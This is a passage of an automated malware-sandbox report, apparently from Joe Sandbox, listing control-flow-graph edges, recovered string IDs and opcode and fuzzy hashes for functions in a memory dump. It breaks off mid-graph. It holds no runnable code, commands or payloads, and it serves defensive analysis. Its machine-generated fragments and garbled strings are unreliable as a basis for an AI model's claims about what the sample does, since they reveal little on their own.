                                                                                                                                                                                    control_flow_graph 426 15ca08-15ca38 428 15ca3f-15cb1c call 1541a0 call 153cc0 426->428 429 15ca3a 426->429 439 15cb23-15cb44 call 155658 428->439 440 15cb1e 428->440 429->428 442 15cb49-15cb54 439->442 440->439 443 15cb56 442->443 444 15cb5b-15cb5f 442->444 443->444 445 15cb64-15cb6b 444->445 446 15cb61-15cb62 444->446 448 15cb72-15cb80 445->448 449 15cb6d 445->449 447 15cb83-15cbc7 446->447 453 15cc2d-15cc44 447->453 448->447 449->448 455 15cc46-15cc6b 453->455 456 15cbc9-15cbdf 453->456 462 15cc83 455->462 463 15cc6d-15cc82 455->463 460 15cbe1-15cbed 456->460 461 15cc09 456->461 464 15cbf7-15cbfd 460->464 465 15cbef-15cbf5 460->465 466 15cc0f-15cc2c 461->466 463->462 467 15cc07 464->467 465->467 466->453 467->466
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 3cc33bec737a3448e39c26529fc7b6ccfd71377673a89d46e974f958d9ee3e2c
                                                                                                                                                                                    • Instruction ID: 3fae17e79a507cbe47c12a81fda5b2f8b45ef3d5b455dcc2a9218d3d9cd6f24d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc33bec737a3448e39c26529fc7b6ccfd71377673a89d46e974f958d9ee3e2c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D81D974E00218CFDB14DFA9D884A9DBBF2BF89301F14C069E819AB365DB349945CF50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 471 15ccd8-15cd08 472 15cd0f-15cdec call 1541a0 call 153cc0 471->472 473 15cd0a 471->473 483 15cdf3-15ce14 call 155658 472->483 484 15cdee 472->484 473->472 486 15ce19-15ce24 483->486 484->483 487 15ce26 486->487 488 15ce2b-15ce2f 486->488 487->488 489 15ce34-15ce3b 488->489 490 15ce31-15ce32 488->490 492 15ce42-15ce50 489->492 493 15ce3d 489->493 491 15ce53-15ce97 490->491 497 15cefd-15cf14 491->497 492->491 493->492 499 15cf16-15cf3b 497->499 500 15ce99-15ceaf 497->500 509 15cf53 499->509 510 15cf3d-15cf52 499->510 504 15ceb1-15cebd 500->504 505 15ced9 500->505 506 15cec7-15cecd 504->506 507 15cebf-15cec5 504->507 508 15cedf-15cefc 505->508 511 15ced7 506->511 507->511 508->497 510->509 511->508
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 141cc41384bbc918fc636386b024ba501f52b26b8b8cf7a9920e8b485240f353
                                                                                                                                                                                    • Instruction ID: dddc18f631f87f20bcddfbecb2b9521728cee665c2a6fff15fa5fb21f779a6e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 141cc41384bbc918fc636386b024ba501f52b26b8b8cf7a9920e8b485240f353
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B81B674E00218DFDB18DFAAD984A9DBBF2BF88301F14D069E819AB365DB345985CF50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 515 15c738-15c768 516 15c76f-15c84c call 1541a0 call 153cc0 515->516 517 15c76a 515->517 527 15c853-15c874 call 155658 516->527 528 15c84e 516->528 517->516 530 15c879-15c884 527->530 528->527 531 15c886 530->531 532 15c88b-15c88f 530->532 531->532 533 15c894-15c89b 532->533 534 15c891-15c892 532->534 536 15c8a2-15c8b0 533->536 537 15c89d 533->537 535 15c8b3-15c8f7 534->535 541 15c95d-15c974 535->541 536->535 537->536 543 15c976-15c99b 541->543 544 15c8f9-15c90f 541->544 553 15c9b3 543->553 554 15c99d-15c9b2 543->554 548 15c911-15c91d 544->548 549 15c939 544->549 550 15c927-15c92d 548->550 551 15c91f-15c925 548->551 552 15c93f-15c95c 549->552 555 15c937 550->555 551->555 552->541 554->553 555->552
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 31a3fe3f89bde231473982efef29ec63b9c5909ab9c5370d13adab27545608ed
                                                                                                                                                                                    • Instruction ID: d75d5a5a282f8f97958e29c12c7c7adb46759c52fb64051e3335fa0b18517c7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31a3fe3f89bde231473982efef29ec63b9c5909ab9c5370d13adab27545608ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1581D974E00218CFDB18DFAAD994A9DBBF2BF88305F14D069E818AB365DB345945CF50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 559 15cfac-15cfd8 560 15cfdf-15d0bc call 1541a0 call 153cc0 559->560 561 15cfda 559->561 571 15d0c3-15d0e4 call 155658 560->571 572 15d0be 560->572 561->560 574 15d0e9-15d0f4 571->574 572->571 575 15d0f6 574->575 576 15d0fb-15d0ff 574->576 575->576 577 15d104-15d10b 576->577 578 15d101-15d102 576->578 580 15d112-15d120 577->580 581 15d10d 577->581 579 15d123-15d167 578->579 585 15d1cd-15d1e4 579->585 580->579 581->580 587 15d1e6-15d20b 585->587 588 15d169-15d17f 585->588 594 15d223 587->594 595 15d20d-15d222 587->595 592 15d181-15d18d 588->592 593 15d1a9 588->593 596 15d197-15d19d 592->596 597 15d18f-15d195 592->597 598 15d1af-15d1cc 593->598 595->594 599 15d1a7 596->599 597->599 598->585 599->598
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                                                                    • Opcode ID: 1da059be569a1ab0fb8d89bd106cc4eff17ade6b969579fb125f2f93a90b8dd4
                                                                                                                                                                                    • Instruction ID: bb63b8286a6ee655f3295ae2703b547c6d740c5a700e51ac075504a27ab8600c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1da059be569a1ab0fb8d89bd106cc4eff17ade6b969579fb125f2f93a90b8dd4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A81C974E00618CFDB14DFAAD984A9DBBF2BF89301F14C069E819AB365DB349985CF50
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                                                                    • Opcode ID: 3ffb9c0d81487b2e8f9faf5fc2eb532506a8dda79b63d623467c8f400d834daf
                                                                                                                                                                                    • Instruction ID: 63d563f49e07a15abd9c7f02ca2c7cb90970ee2e2f2860dee67afcde90b6b17e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ffb9c0d81487b2e8f9faf5fc2eb532506a8dda79b63d623467c8f400d834daf
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCA27130A40209CFCB15CF68C994AAEBBF2BF88301F558659E815DF261D735ED89CB52

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 928 156fc8-156ffe 929 157006-15700c 928->929 1055 157000 call 1569a0 928->1055 1056 157000 call 157118 928->1056 1057 157000 call 156fc8 928->1057 930 15705c-157060 929->930 931 15700e-157012 929->931 932 157077-15708b 930->932 933 157062-157071 930->933 934 157014-157019 931->934 935 157021-157028 931->935 940 157093-15709a 932->940 1058 15708d call 15a080 932->1058 1059 15708d call 159de0 932->1059 1060 15708d call 15a0e8 932->1060 936 157073-157075 933->936 937 15709d-1570a7 933->937 934->935 938 1570fe-15713b 935->938 939 15702e-157035 935->939 936->940 942 1570b1-1570b5 937->942 943 1570a9-1570af 937->943 950 157146-157166 938->950 951 15713d-157143 938->951 939->930 941 157037-15703b 939->941 944 15703d-157042 941->944 945 15704a-157051 941->945 946 1570bd-1570f7 942->946 948 1570b7 942->948 943->946 944->945 945->938 949 157057-15705a 945->949 946->938 948->946 949->940 956 15716d-157174 950->956 957 157168 950->957 951->950 960 157176-157181 956->960 959 1574fc-157505 957->959 961 157187-15719a 960->961 962 15750d-157519 960->962 967 1571b0-1571cb 961->967 968 15719c-1571aa 961->968 969 157530-15753a 962->969 970 15751b-15752f 962->970 975 1571cd-1571d3 967->975 976 1571ef-1571f2 967->976 968->967 974 157484-15748b 968->974 970->969 974->959 979 15748d-15748f 974->979 977 1571d5 975->977 978 1571dc-1571df 975->978 980 15734c-157352 976->980 981 1571f8-1571fb 976->981 977->978 977->980 983 157212-157218 977->983 984 15743e-157441 977->984 978->983 985 1571e1-1571e4 978->985 986 157491-157496 979->986 987 15749e-1574a4 979->987 980->984 988 157358-15735d 980->988 981->980 982 157201-157207 981->982 982->980 989 15720d 982->989 990 15721e-157220 983->990 991 15721a-15721c 983->991 992 157447-15744d 984->992 993 157508 984->993 994 15727e-157284 985->994 995 1571ea 985->995 986->987 987->962 996 1574a6-1574ab 987->996 988->984 989->984 1000 15722a-157233 990->1000 991->1000 1001 157472-157476 992->1001 1002 15744f-157457 992->1002 993->962 994->984 999 15728a-157290 994->999 995->984 997 1574f0-1574f3 996->997 998 1574ad-1574b2 996->998 997->993 1010 1574f5-1574fa 997->1010 998->993 1003 1574b4 998->1003 1004 157296-157298 999->1004 1005 157292-157294 999->1005 1007 157235-157240 1000->1007 1008 157246-15726e 1000->1008 1001->974 1009 157478-15747e 1001->1009 1002->962 1006 15745d-15746c 1002->1006 1011 1574bb-1574c0 1003->1011 1012 1572a2-1572b9 1004->1012 1005->1012 1006->967 1006->1001 1007->984 1007->1008 1030 157274-157279 1008->1030 1031 157362-157398 1008->1031 1009->960 1009->974 1010->959 1010->979 1013 1574e2-1574e4 1011->1013 1014 1574c2-1574c4 1011->1014 1023 1572e4-15730b 1012->1023 1024 1572bb-1572d4 1012->1024 1013->993 1021 1574e6-1574e9 1013->1021 1018 1574c6-1574cb 1014->1018 1019 1574d3-1574d9 1014->1019 1018->1019 1019->962 1022 1574db-1574e0 1019->1022 1021->997 1022->1013 1026 1574b6-1574b9 1022->1026 1023->993 1035 157311-157314 1023->1035 1024->1031 1036 1572da-1572df 1024->1036 1026->993 1026->1011 1030->1031 1037 1573a5-1573ad 1031->1037 1038 15739a-15739e 1031->1038 1035->993 1039 15731a-157343 1035->1039 1036->1031 1037->993 1042 1573b3-1573b8 1037->1042 1040 1573a0-1573a3 1038->1040 1041 1573bd-1573c1 1038->1041 1039->1031 1054 157345-15734a 1039->1054 1040->1037 1040->1041 1043 1573e0-1573e4 1041->1043 1044 1573c3-1573c9 1041->1044 1042->984 1047 1573e6-1573ec 1043->1047 1048 1573ee-15740d call 1576f1 1043->1048 1044->1043 1046 1573cb-1573d3 1044->1046 1046->993 1049 1573d9-1573de 1046->1049 1047->1048 1051 157413-157417 1047->1051 1048->1051 1049->984 1051->984 1052 157419-157435 1051->1052 1052->984 1054->1031 1055->929 1056->929 1057->929 1058->940 1059->940 1060->940
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$,bq$,bq
                                                                                                                                                                                    • API String ID: 0-879173519
                                                                                                                                                                                    • Opcode ID: 90a658acc7c59b905ba06badb3587f8b066b6932cb2a27ceb38b1623c6339e2d
                                                                                                                                                                                    • Instruction ID: 77894e49f89b8498a4986fe1606507c40b8f60a64d38de4a496b08a800737754
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90a658acc7c59b905ba06badb3587f8b066b6932cb2a27ceb38b1623c6339e2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50026030A04219DFCB15CF68E885AADBBF2BF49301F158469EC25AB2A1D730DD49CF51
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$Hbq
                                                                                                                                                                                    • API String ID: 0-662517225
                                                                                                                                                                                    • Opcode ID: 2f255119b15fa8eddfb309c33493c5ad7298bd0a56e2fd79feb70b138f27ceee
                                                                                                                                                                                    • Instruction ID: e087861cde529446527f40e044ddd5e35a6e6a862e3519c5e3f19bd719a405fe
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f255119b15fa8eddfb309c33493c5ad7298bd0a56e2fd79feb70b138f27ceee
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F127E70B00219CFDB14DF69C854AAEBBF6BF88301F248569E959DB3A1DB309D45CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6759c6e401960e395483459c36994381baf53bb7ecc4897ce9d33cd99fd89b5f
                                                                                                                                                                                    • Instruction ID: ee1eabd99232ec622da3545dfe6d36c2f22f103b15a2c4a96790317ec3c35bb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6759c6e401960e395483459c36994381baf53bb7ecc4897ce9d33cd99fd89b5f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9551A474E00308DFDB18DFAAD584A9DBBF2BF89300F209429E819AB364DB359945CF54

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 1576f1-157725 1 157b54-157b58 0->1 2 15772b-15774e 0->2 3 157b71-157b7f 1->3 4 157b5a-157b6e 1->4 11 157754-157761 2->11 12 1577fc-157800 2->12 9 157b81-157b96 3->9 10 157bf0-157c05 3->10 17 157b9d-157baa 9->17 18 157b98-157b9b 9->18 19 157c07-157c0a 10->19 20 157c0c-157c19 10->20 24 157770 11->24 25 157763-15776e 11->25 15 157802-157810 12->15 16 157848-157851 12->16 15->16 36 157812-15782d 15->36 21 157c67 16->21 22 157857-157861 16->22 26 157bac-157bed 17->26 18->26 27 157c1b-157c56 19->27 20->27 30 157c6c-157cb4 21->30 22->1 28 157867-157870 22->28 31 157772-157774 24->31 25->31 73 157c5d-157c64 27->73 34 157872-157877 28->34 35 15787f-15788b 28->35 31->12 38 15777a-1577dc 31->38 34->35 35->30 41 157891-157897 35->41 59 15782f-157839 36->59 60 15783b 36->60 85 1577e2-1577f9 38->85 86 1577de 38->86 43 15789d-1578ad 41->43 44 157b3e-157b42 41->44 57 1578c1-1578c3 43->57 58 1578af-1578bf 43->58 44->21 47 157b48-157b4e 44->47 47->1 47->28 61 1578c6-1578cc 57->61 58->61 62 15783d-15783f 59->62 60->62 61->44 65 1578d2-1578e1 61->65 62->16 66 157841 62->66 71 1578e7 65->71 72 15798f-1579ba call 157538 * 2 65->72 66->16 75 1578ea-1578fb 71->75 89 157aa4-157abe 72->89 90 1579c0-1579c4 72->90 75->30 78 157901-157913 75->78 78->30 80 157919-157931 78->80 143 157933 call 1580c9 80->143 144 157933 call 1580d8 80->144 84 157939-157949 84->44 88 15794f-157952 84->88 85->12 86->85 91 157954-15795a 88->91 92 15795c-15795f 88->92 89->1 112 157ac4-157ac8 89->112 90->44 94 1579ca-1579ce 90->94 91->92 95 157965-157968 91->95 92->21 92->95 97 1579f6-1579fc 94->97 98 1579d0-1579dd 94->98 99 157970-157973 95->99 100 15796a-15796e 95->100 102 157a37-157a3d 97->102 103 1579fe-157a02 97->103 115 1579ec 98->115 116 1579df-1579ea 98->116 99->21 101 157979-15797d 99->101 100->99 100->101 101->21 104 157983-157989 101->104 106 157a3f-157a43 102->106 107 157a49-157a4f 102->107 103->102 105 157a04-157a0d 103->105 104->72 104->75 110 157a1c-157a32 105->110 111 157a0f-157a14 105->111 106->73 106->107 113 157a51-157a55 107->113 114 157a5b-157a5d 107->114 110->44 111->110 120 157b04-157b08 112->120 121 157aca-157ad4 call 1563e0 112->121 113->44 113->114 117 157a92-157a94 114->117 118 157a5f-157a68 114->118 119 1579ee-1579f0 115->119 116->119 117->44 126 157a9a-157aa1 117->126 124 157a77-157a8d 118->124 125 157a6a-157a6f 118->125 119->44 119->97 120->73 128 157b0e-157b12 120->128 121->120 131 157ad6-157aeb 121->131 124->44 125->124 128->73 130 157b18-157b25 128->130 134 157b34 130->134 135 157b27-157b32 130->135 131->120 140 157aed-157b02 131->140 137 157b36-157b38 134->137 135->137 137->44 137->73 140->1 140->120 143->84 144->84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                                                                    • Opcode ID: 7c0f1866740aa5813f987a84a9c3681176c68173d86c49581662cb92a4ce5a28
                                                                                                                                                                                    • Instruction ID: 4b38eb88c1100b196796ee3b5fcfa0109ca1e0a1ff5a3baa60863e5ecf78434a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c0f1866740aa5813f987a84a9c3681176c68173d86c49581662cb92a4ce5a28
                                                                                                                                                                                    • Instruction Fuzzy Hash: A9126A30A04205CFCB15CF68E985AAEBBF1FF48315F148599E8299B3A1D731ED49CB50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1062 158490-15897e 1137 158984-158994 1062->1137 1138 158ed0-158f05 1062->1138 1137->1138 1139 15899a-1589aa 1137->1139 1142 158f07-158f0c 1138->1142 1143 158f11-158f2f 1138->1143 1139->1138 1141 1589b0-1589c0 1139->1141 1141->1138 1144 1589c6-1589d6 1141->1144 1145 158ff6-158ffb 1142->1145 1156 158fa6-158fb2 1143->1156 1157 158f31-158f3b 1143->1157 1144->1138 1146 1589dc-1589ec 1144->1146 1146->1138 1148 1589f2-158a02 1146->1148 1148->1138 1149 158a08-158a18 1148->1149 1149->1138 1151 158a1e-158a2e 1149->1151 1151->1138 1152 158a34-158a44 1151->1152 1152->1138 1154 158a4a-158a5a 1152->1154 1154->1138 1155 158a60-158ecf 1154->1155 1161 158fb4-158fc0 1156->1161 1162 158fc9-158fd5 1156->1162 1157->1156 1163 158f3d-158f49 1157->1163 1161->1162 1171 158fc2-158fc7 1161->1171 1172 158fd7-158fe3 1162->1172 1173 158fec-158fee 1162->1173 1168 158f6e-158f71 1163->1168 1169 158f4b-158f56 1163->1169 1174 158f73-158f7f 1168->1174 1175 158f88-158f94 1168->1175 1169->1168 1182 158f58-158f62 1169->1182 1171->1145 1172->1173 1184 158fe5-158fea 1172->1184 1173->1145 1174->1175 1187 158f81-158f86 1174->1187 1179 158f96-158f9d 1175->1179 1180 158ffc-15901e 1175->1180 1179->1180 1181 158f9f-158fa4 1179->1181 1188 159020 1180->1188 1189 15902e 1180->1189 1181->1145 1182->1168 1193 158f64-158f69 1182->1193 1184->1145 1187->1145 1188->1189 1191 159027-15902c 1188->1191 1192 159030-159031 1189->1192 1191->1192 1193->1145
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                                                    • Opcode ID: 6bd6d199879407c681674d981c5dd2e4d6ea0fd25994ff475f2b2a7b55d138a2
                                                                                                                                                                                    • Instruction ID: 6453bbbd688fdba1efae57db58d300ac64bbd85d5ae488972ba13473deba9f24
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bd6d199879407c681674d981c5dd2e4d6ea0fd25994ff475f2b2a7b55d138a2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B522274A00218CFEB149BA4C960B9EBB77EF44300F1081A9D50A7B3A5CF359E899F51

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1504 155f38-155f5a 1505 155f70-155f7b 1504->1505 1506 155f5c-155f60 1504->1506 1509 155f81-155f83 1505->1509 1510 156023-15604f 1505->1510 1507 155f62-155f6e 1506->1507 1508 155f88-155f8f 1506->1508 1507->1505 1507->1508 1512 155f91-155f98 1508->1512 1513 155faf-155fc2 call 155f38 1508->1513 1511 15601b-156020 1509->1511 1516 156056-1560ae 1510->1516 1512->1513 1514 155f9a-155fa5 1512->1514 1519 155fc4-155fc8 1513->1519 1520 155fca-155fd2 1513->1520 1514->1516 1517 155fab-155fad 1514->1517 1536 1560b0-1560b6 1516->1536 1537 1560bd-1560cf 1516->1537 1517->1511 1519->1520 1523 155fe5-156004 call 1569a0 1519->1523 1524 155fd4-155fd9 1520->1524 1525 155fe1-155fe3 1520->1525 1530 156006-156011 call 15af36 1523->1530 1531 156019 1523->1531 1524->1525 1525->1511 1533 156017 1530->1533 1531->1511 1533->1511 1536->1537 1539 1560d5-1560d9 1537->1539 1540 156163-156167 call 156300 1537->1540 1541 1560e9-1560f6 1539->1541 1542 1560db-1560e7 1539->1542 1543 15616d-156173 1540->1543 1550 1560f8-156102 1541->1550 1542->1550 1544 156175-15617b 1543->1544 1545 15617f-156186 1543->1545 1548 1561e1-15622f 1544->1548 1549 15617d 1544->1549 1592 156237-156240 1548->1592 1549->1545 1553 156104-156113 1550->1553 1554 15612f-156133 1550->1554 1562 156115-15611c 1553->1562 1563 156123-15612d 1553->1563 1555 156135-15613b 1554->1555 1556 15613f-156143 1554->1556 1559 15613d 1555->1559 1560 156189-1561da 1555->1560 1556->1545 1561 156145-156149 1556->1561 1559->1545 1560->1548 1564 156247-15626b 1561->1564 1565 15614f-156161 1561->1565 1562->1563 1563->1554 1573 156271-156273 1564->1573 1574 15626d-15626f 1564->1574 1565->1545 1577 156275-156279 1573->1577 1578 156284-156286 1573->1578 1576 1562e9-1562ec 1574->1576 1583 15627f-156282 1577->1583 1584 15627b-15627d 1577->1584 1580 156299-15629f 1578->1580 1581 156288-15628c 1578->1581 1588 1562a1-1562c8 1580->1588 1589 1562ca-1562cc 1580->1589 1586 156292-156297 1581->1586 1587 15628e-156290 1581->1587 1583->1576 1584->1576 1586->1576 1587->1576 1591 1562d3-1562d5 1588->1591 1589->1591 1595 1562d7-1562d9 1591->1595 1596 1562db-1562dd 1591->1596 1592->1564 1595->1576 1597 1562e6 1596->1597 1598 1562df-1562e4 1596->1598 1597->1576 1598->1576
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940263339.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_150000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                                                                    • Opcode ID: 043eb065b39e1f9a42f84c85d7352f554340dd94d8162df8af46fb208a4312cc
                                                                                                                                                                                    • Instruction ID: 45ed926e07e18536ecf0f7c629c3859fd852e912694b138277ed2ae26f9a2038
                                                                                                                                                                                    • Opcode Fuzzy Hash: 043eb065b39e1f9a42f84c85d7352f554340dd94d8162df8af46fb208a4312cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BB19E30704255CFCB159F398894A7A7BB6AF88302F544569E81ACB3A1DB34CC8AD791

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1609 156498-1564a5 1610 1564a7-1564ab 1609->1610 1611 1564ad-1564af 1609->1611 1610->1611 1612 1564b4-1564bf 1610->1612 1613 1566c0-1566c7 1611->1613 1614 1564c5-1564cc 1612->1614 1615 1566c8 1612->1615 1616 156661-156667 1614->1616 1617 1564d2-1564e1 1614->1617 1619 1566cd-1566e0 1615->1619 1620 15666d-156671 1616->1620 1621 156669-15666b 1616->1621 1618 1564e7-1564f6 1617->1618 1617->1619 1627 1564f8-1564fb 1618->1627 1628 15650b-15650e 1618->1628 1630 1566e2-156705 1619->1630 1631 156718-15671a 1619->1631 1622 156673-156679 1620->1622 1623 1566be 1620->1623 1621->1613 1622->1615 1625 15667b-15667e 1622->1625 1623->1613 1625->1615 1629 156680-156695 1625->1629 1634 1564fd-156500 1627->1634 1635 15651a-156520 1627->1635 1628->1635 1636 156510-156513 1628->1636 1655 156697-15669d 1629->1655 1656 1566b9-1566bc 1629->1656 1645 156707-15670c 1630->1645 1646 15670e-156712 1630->1646 1632 15671c-15672e 1631->1632 1633 15672f-156736 1631->1633 1639 156506 1634->1639 1640 156601-156607 1634->1640 1637 156522-156528 1635->1637 1638 156538-156555 1635->1638 1641 156515 1636->1641 1642 156566-15656c 1636->1642 1647 15652c-156536 1637->1647 1648 15652a 1637->1648 1679 15655e-156561 1638->1679 1652 15662c-156639 1639->1652 1650 15661f-156629 1640->1650 1651 156609-15660f 1640->1651 1641->1652 1653 156584-156596 1642->1653 1654 15656e-156574 1642->1654 1645->1631 1646->1631 1647->1638 1648->1638 1650->1652 1660 156611 1651->1660 1661 156613-15661d 1651->1661 1673 15664d-15664f 1652->1673 1674 15663b-15663f 1652->1674 1675 1565a6-1565c9 1653->1675 1676 156598-1565a4 1653->1676 1662 156576 1654->1662 1663 156578-156582 1654->1663 1657 1566af-1566b2 1655->1657 1658 15669f-1566ad 1655->1658 1656->1613 1657->1615 1665 1566b4-1566b7 1657->1665 1658->1615 1658->1657 1660->1650 1661->1650 1662->1653 1663->1653 1665->1655 1665->1656 1678 156653-156656 1673->1678 1674->1673 1677 156641-156645 1674->1677 1675->1615 1687 